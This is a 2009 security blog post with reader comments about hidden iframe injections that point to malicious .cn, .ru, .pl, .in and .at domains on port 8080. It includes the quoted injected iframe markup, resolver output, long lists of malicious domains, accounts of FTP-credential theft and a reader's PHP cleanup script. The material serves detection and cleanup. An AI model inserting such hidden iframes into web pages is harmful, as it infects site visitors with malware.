msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Hidden CN Iframes Are Still Prevalent

   25 Jun 09   Filed in Website exploits

This post is a reminder that .cn iframe attacks are still among leaders.

The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The currently form of the malicious code looks like this

< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.

DNS records

All those .cn domains point at the same IP address, or rather, at the same group of IP addresses. Each of them can serve malicious content from 5 different servers in different countries, so that if one server is temporarily unavailable or permanently shut down, the rest four will still be working.

Here is the output of the dig command that shows 5 “A” records (June 22):

$ dig shopmoviefestival.cn
...
;; QUESTION SECTION:
;shopmoviefestival.cn.          IN      A
;; ANSWER SECTION:
shopmoviefestival.cn.   432     IN      A       77 .37 .19 .173
shopmoviefestival.cn.   432     IN      A       88 .191 .78 .48
shopmoviefestival.cn.   432     IN      A       89 .171 .115 .10
shopmoviefestival.cn.   432     IN      A       90 .156 .144 .78
shopmoviefestival.cn.   432     IN      A       91 .121 .146 .101
...

This set of IP addresses changes over the time as some servers become unavailable. At the moment of this article publication (June 25) the set of A records looks like this: 
[
90 .156 .144 .78 ], [ 77 .37 .19 .179 ], [ 77 .37 .18 .36 ], [ 77 .37 .19 .43 ], [ 77 .37 .19 .173 ].

Not only .cn domains

A couple of days ago I noticed similar hidden iframes with .pl domains in URLs.

a3h . pl:8080/ ts/ in .cgi?pepsi76 and a3l . pl:8080/ ts/ in .cgi?pepsi80

No wonder, these domains link to the same set of 5 IPs.

Update (June 29, 2009): Have found similar iframes with .ru domains in URLs: a3h .ru and a5l .ru

Update (July 8, 2009): Have found similar iframe with .at domain in URL: a3l .at

Update (July 21, 2009): Now we have .in: q3e .in and q3t .in

Here are some other domain names that you may encounter as a source parameter of those hidden iframes:

  • combinebet .cn
  • hugetoplocate .cn
  • hugebestbuy .cn
  • globalnameshop .cn
  • yournameshop .cn
  • shopfilmlifeonline .cn
  • superfilmlife .cn
  • filmlifeimages .cn
  • shopfilmlifeforce .cn
  • shopvideocommission .cn
  • bigtopcreative .cn
  • bigtopleads .cn
  • bigtopstudios .cn
  • gianttopnano .cn
  • coolnamemart .cn
  • bestlitevideo .cn
  • yourlotcar .cn
  • namegamestore .cn
  • thehomename .cn
  • shopmoviefestival .cn
  • shopmovielife .cn
  • filmbridgelife .cn
  • shoponlinefilmsite .cn
  • yourfilmlife .cn
  • shopfilmexistence .cn
  • gianthighest .cn
  • more

Detection

Hidden iframes are easily detected by Unmask Parasites.

Detection

Removal

You can find the clean up instructions in my original post about the .cn iframes. They include malware removal from a local computer, changing and securing FTP passwords and finally uploading a clean website copy from a backup.

Finally if your site is blacklisted by Google, request a malware review via Webmaster Tools as soon as possible. If your site is clean, the warning will be removed in a few hours.

As always, any comments are welcome.

Similar posts:

Reader's Comments (33)

  1. |

    Just got one of these attacks today. Such a bother to stop in the middle of work and have to start up AVG and clean up the mess. Thank god it only infected one of the websites.

    Muchos Gracias for the info about clearing up the problem.

  2. |

    I have a theory about the use of port 8080:

    http://wirewatcher.wordpress.com/2009/06/26/sidestepping-inline-url-content-filters/

  3. |

    I’ll be posting new domains names used in this attack here:

    bestfilmlife .cn, mediahomenameshopmovie .cn, shopfilmlifescience .cn, bigtopbrands .cn, bigtopstats .cn, brandnameshoppin .cn, turbonamestore .cn, mixgrouptravel .cn, findyourbigwhy .cn, thebestwaytofind .cn, mybetsportswager .cn, shopvideofest .cn, martpictureexistence .cn, namezeroshop .cn, shopfilmworld .cn, litetopfindguide .cn, shoppicturelife .cn, liteautogreatest .cn, nonfathighestlocate .cn, findabigrig .cn, ultralitecar .cn, jumbobestrate .cn, solmixgroup .cn, cubanbigtop .cn, premiumnonfat .cn, newnetnameshop .cn, greatshopfilm .cn, bestmortgagefind .cn, michaelsbestway2findalawyer .cn, casinoslotbet .cn, greatbetpoker .cn, mymixwager.cn

    a3j .pl

    39j .ru, 39q .ru, 39t .ru, 39w .ru, 39y .ru, 3a2 .ru, 3b6 .ru, 3b8 .ru, 3bf .ru, 3bp .ru, 3bq. .ru, 3c9 .ru, 3cf .ru, 3cw .ru, 3e0 .ru, 3f2 .ru, 3f8 .ru, 3f9 .ru,
    a3j .ru, a3l .ru, a3q .ru, a3t .ru, a5m .ru, a5f .ru, a5h .ru, a5g .ru, a5i .ru, a5j .ru,
    b1a .ru, b3a .ru, b5c .ru, b5z .ru, b7g .ru, b7p .ru, b8e .ru,
    c1z .ru, c3q .ru, c5p .ru, c5y .ru, c6y .ru, c7h .ru,
    q0a .ru, q0c .ru, q0l .ru, q1b .ru, q1k .ru, q1m .ru, q1u .ru, q3s .ru, q40 .ru, q41 .ru, q5a .ru, q5c .ru, q5l .ru, q5m .ru, q5u .ru, q5v .ru,
    u0c .ru, u0s .ru, u0t .ru, u1a .ru, u1b .ru, u1l .ru, u1w .ru, u3w .ru, u5c .ru, u5d .ru, u5l .ru, u5w .ru, u6b .ru, u6c .ru, u6k .ru, u6l. ru, u7e .ru, u7g .ru, u7o .ru, u7z.ru, u8r .ru, u9a .ru, u9b .ru, u9i .ru
    x3y .ru, x5o .ru, x6i .ru, x7o .ru, x8c .ru, x8e .ru, x8m .ru, x8n .ru, x8o .ru, x8v .ru, x9o .ru, x9v .ru, x9w .ru, x9y .ru, xf0 .ru, xf8 .ru, xi3 .ru, xj5 .ru, xq9 .ru, xv9 .ru
    6w2 .ru

    q1n .in, q1x .in, q5n .in, q5y .in,
    u0r .in, u19 .in, u1j .in, u3h .in
    x0a .in, x1g .in, x3v .in, x6p .in, x0q .in, x7b .in, x8l .in, x8u .in, x9d .in, xb4 .in, xc6 .in, xh9 .in, xg8 .in, xt6 .in,
    bqtl.in, gqil. in, oufc .in, soac .in

    b6l .at, b9g .at, c1z .at, c6y .at, f5l .at, f7p .at,

    sexfinish .ru, red-wolf .ru, xuiligan .ru, bogoxulstvo .ru, pornishe .ru, sexsila .ru, past-another-life .ru, some-other-life .ru, theanotherlife .ru, last-another-life .ru, oneanotherlife .ru, previous-life .ru, life-before .ru, formerlife .ru, bestage .ru, agebee .ru, age-free .ru, inother .ru, age-free .ru, biozavr .ru, bio-tube .ru, yourbio .ru, youbio .ru, bio-age .ru, beo-free .ru, sexsila .ru, 18-plus .ru, age-t .ru, icq-mobila .ru, telicq .ru, ageend .ru, ageegle .ru, age-inf .ru, ageinf .ru, ageee .ru, what-is-your-iq .ru, lifoon .ru, offiget .ru, sexfinish .ru, test-medicine .ru, your-great-mind .ru, on-liffe .ru, realnisex .ru, kasnis .ru, bitest .ru, pornovoina .ru, bigargazm .ru, 911test .ru, riday .ru, ridai .ru, xxxtaina .ru, bruzg .ru, traxnolog .ru, theprevious .ru, the-previous-life .ru, deathtesting .ru, the-past .ru, doxyia .ru, onelifebefore .ru, before-this-life .ru, onetherlife .ru, bestbeo .ru, soul-of-man .ru, soulinyou .ru, privius-life .ru, former-life .ru, bestbio .ru, bionaft .ru, testbio .ru, hochesh-li .ru, before-life .ru, biovoz. ru, life-death-test .ru, moya-podruga .ru, agefree .ru, b-i-o-v .ru, age-ega .ru, bio-v .ru, bio-vozrast .ru, check-your-iq .ru, age-t .ru, t-age .ru, bio-a .ru, icq-tel .ru, soulinyou .ru, styleicq .ru, samsungicq .ru, nokiaicq .ru, qiiiq .ru, iqste .ru, age-age .ru, dedlife .ru

  4. |

    I can add some more, too:

    bigtopmanagement .cn
    lotwager .cn

    And possibly also related:

    mialo-goodle dot info / cn.php ? mkx

    …although that last one doesn’t resolve at the moment.

  5. |

    I’m monitoring a site with a .cn:8080 defacement. This has now changed to:

    hxxp: / / b1a dot ru : 8080 / index dot php

  6. |

    Hi, I work for a hosting company and we’re seeing so many of these attacks. Driving me insane, but thanks for the blog, it’s helped me keep on top of this mess.

  7. |

    Hello friends,

    as i was also facing the same problem but after changing my FTP password i sovled the problem. so try to change your ftp password. and enjoy .

    Regards,
    Balmukund Gohil
    Web Designer
    9819889092.

  8. |

    We got hit too, right at the end of June. They injected their iframe code, exactly like that posted above but with the bigtopbrands domain and slightly different dimensions, right after the body tag in every file with “index”, “home”, or “main” in the name. This resulted in a gap of a hundred or so pixels at the top of each affected page when viewed in a browser, so fortunately I could see something was wrong right away and get it fixed. Also, the last couple lines of each modified page were missing.

    I found the attack in our logs, and as near as I can tell, here’s what happened.

    They logged in using our FTP credentials. (We are guessing they got them by using an exploit in Adobe Reader v8.) They downloaded one file, index.htm, and then logged out. This took a total of three seconds from connection to logout.

    Three seconds after they logged out, they logged back in from a completely different IP, uploaded the modified version of the file they’d just downloaded, and logged back out. Again, this took just three seconds to do.

    Five seconds later, they logged back in from yet another IP and downloaded another index file (I have one in each subdirectory). In a total of five seconds, they had it and logged out.

    Three seconds later, a fourth IP logged in and uploaded that index file with their code added, then logged out.

    This cycle repeated until they had injected their code into all the targeted files on my entire site, including a forum (which their code or the missing last lines broke, another big clue something was amiss).

    Out of 208 total logins, only 17 IPs were used twice, and only one was used 3 times. All the rest were unique. They resolve to countries all over the world- India, Nepal, Hong Kong, Argentina, the U.S., Australia, Canada, Japan, Hungary, and Brazil, to name just a random few.

    The entire attack took just over an hour, so if you have a lot of index-type files like I do and happen to catch them in the act, changing your FTP password should stop them (then immediately follow the posted clean-up instructions), but blocking IPs won’t affect them for even a moment- there are just too many.

    Thanks for the post. It gave me some great insight into exactly what happened to us and how.

    • |

      Hi Mac,

      Thanks for sharing this info. This is a great description of a distributed attack.

    • |

      Hi Mac,

      I gave the change-your-FTP-credentials advice to a customer, but it didn’t stop the defacements.

      Here’s why:

      The customer’s local machine had password-stealing malware on it that was uploading his FileZilla settings. He would change the FTP password on the server, and then change it in FileZilla. Soon after he did that, the new FileZilla passwords got uploaded, and his site was defaced again!

      Take care if you’re using FileZilla, and don’t use it to store your passwords!

      alec

      • |

        Wow, that’s bad news. FileZilla is like the best FTP progs to use. Is FileZilla doing something to prevent this from happening?

        I posted my experience as well, but so far I have not been helped yet, I’m not sure if my PCs are cleaned yet so I dare not change anything on my FTP Program yet.. I just asked my hosting guy to change my password for me

        Here’s my post
        http://forum.lowyat.net/index.php?act=ST&f=25&t=1091018&st=0#entry27188734

        • |

          I’m not sute how the malware steals FTP credentials. In case it estracts them from program configuration files, you can try not to save passwords inside your FTP client. Just type them in every time you connect to your server.

          Another option is to create an alias for your site domain in the “hosts” file and use this alias in FTP program settings. This alias will be useless if used from another computer.

          FileZilla also has a Public Key Authentication option (I didn’t try it though)

          • |

            The most interesting thing is that the guys who were defacing the website seem to know the guys who had the password-stealer on my customer’s PC. They may even be one-and-the-same party, although that could be tricky to prove.

            alec

          • |

            Hi Denis,

            In this specific instance, LDPinch was responsible:

            http://www.viruslist.com/en/viruses/encyclopedia?virusid=147349

            I actually saw the FileZilla usernames/passwords get uploaded to Hacker HQ (along with a load of other stuff). The article above says that the upload is made via SMTP, but this time it was via an HTTP POST request to a .cn domain hosted in Ukraine.

            Quite scary, really!

            alec

  9. |

    Alec,

    Great link to the viruslist. It explains how malware steals passwords. Why sniff traffic or intercept key strokes (this activity can be easily detected by antivirus tools) when you can simple read everything from disk where FTP programs store users’ credentials in plain text

  10. |

    Just got one of these attacks today. My domain is [dot]com[dot]ar -Argentina-. Every index.htm and index.php has the iframe. I´m working with Joomla 1.5, if this helps someone.
    I guess i’ll reinstall the whole e-commerce site.

  11. |

    Three more:

    shopmovieproduction .cn
    b7p .ru
    nyfilmlife .cn

    • |

      “to err is human”

      Was only two more :) b7p .ru was already listed :)_

  12. |

    I found “q38 .ru” appearing in http://www .tresearchexpo.nrct .go .th (a Thailand gov’t web site) via Unmask Parasites. This must be a malicious URL.

  13. |

    A client of mine was also targeted. Addresses used:
    06-07-2009 >> u1w .ru
    08/07/2009 >> u8r .ru
    10-07-2009 >> update .cn
    12-07-2009 >> u9j .ru
    24-07-2009 >> xe5 .in

  14. |

    My client is on a holiday, so i can’t change the FTP pass. Because I have to clean the site every other day, I wrote a script that does that for me. By calling the script every hour with a dronjob, the site keeps clean until she comes back.

    Here’s the script. I hope it’s useful for other people.
    (make sure to backup your site befor using this one)

    <?php
    $path = ".";//define the path as relative

    // filenames infected in Joomla sites:
    list_dir($dir_handle,$path,'index.php');
    list_dir($dir_handle,$path,'index2.php');
    list_dir($dir_handle,$path,'index3.php');
    list_dir($dir_handle,$path,'mainbody.php');
    list_dir($dir_handle,$path,'index.html');

    function list_dir($dir_handle,$path,$filename)
    {
    $dir_handle = @opendir($path) or die("unable to open $path");
    while (false !== ($file = readdir($dir_handle))) {
    $dir =$path.'/'.$file;
    if(is_dir($dir) && $file != '.' && $file !='..' )
    {
    $handle = @opendir($dir) or die("unable to open file $file");
    list_dir($handle, $dir, $filename);
    }
    elseif($file != '.' && $file !='..')
    {
    if(strcmp("$file", "$filename")==0)
    {
    $handle = file_get_contents($dir);
    if ($handle)
    {
    preg_match('/]*>(.*)/s’, $handle, $iframe); // find iframes
    $hacked = str_replace(“<", ">", (str_replace("<", "<", $iframe[0]))); // sanitize HTML for viewing
    if ($hacked)
    {
    echo "\n$dir $hacked”;
    $cleaned = preg_replace(“#$iframe[0]#”, ”, $handle);
    $thisfile = fopen($dir, w) or die(“unable to open file $file”);
    fwrite($thisfile, $cleaned);
    fclose($thisfile);
    echo ‘(cleaned)‘;
    }
    }
    }
    }
    else {
    //do nothing
    }
    }
    closedir($dir_handle);
    }
    ?>

  15. |

    Dear Denis,

    could you explain how could this spyware injure our computer? Where should(n’t) we click to (avoid) the injuries?

    Thanks!

  16. |

    A few more URLs for you:
    http ://q3c .ru:8080/index.php
    http ://q1e .ru:8080/index.php
    http ://x8o .ru:8080/ts/in.cgi?pepsi114

    We had almost every index.html, index.php and several other files infected with these iframes on our server.

  17. |

    Found another on one of my clients’ sites:
    http ://b9g .at:8080/index.php

  18. |

    i got infected with http ://some-other-life .ru:8080/index.php- good thing i have a back up of the files on my wordpress blog and able to restore it. The problem is that the attack me reoccur. damn.

  19. |

    oh, no im being attacked again, help.

  20. |

    I don’t know if the problem attacking one of the servers that I visit is this particular problem but the when my browser popped up w/ a warning and a Google SafeBrowsing report, one of the links that was apparently hosting malware was visaforchina .co .uk

  21. |

    [...] also noticed that Gumblar (and this new attack) infects sites that were previously infected with hidden malicious iframes. That iframe injection attack steals FTP credentials from configuration files of 10 popular FTP [...]

  22. |

    [...] Mii de websiteuri si conturi de hosting au fost compromise in acest fel si au suferit atacuri cu injectii cu iframeuri ascunse, Gumblar, redirectari catre siteuri antivirus false, [...]